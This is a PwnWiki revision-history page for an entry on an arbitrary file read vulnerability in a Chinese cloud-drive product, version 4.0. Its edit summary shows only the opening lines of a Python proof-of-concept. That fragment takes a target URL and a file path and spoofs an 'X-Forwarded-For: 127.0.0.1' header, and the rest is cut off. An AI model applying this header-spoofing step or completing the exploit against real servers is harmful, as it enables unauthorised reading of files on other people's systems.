Revision history of "彩虹外鏈網盤 v4.0 任意文件讀取漏洞"

From PwnWiki

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 09:44, 17 May 2021Pwnwiki talk contribs 587 bytes +587 Created page with "==POC== <pre> import requests import re import sys url = sys.argv[1] file = sys.argv[2] headers={"X-Forwarded-For":"127.0.0.1"} requests = requests.session() html = requests.g..."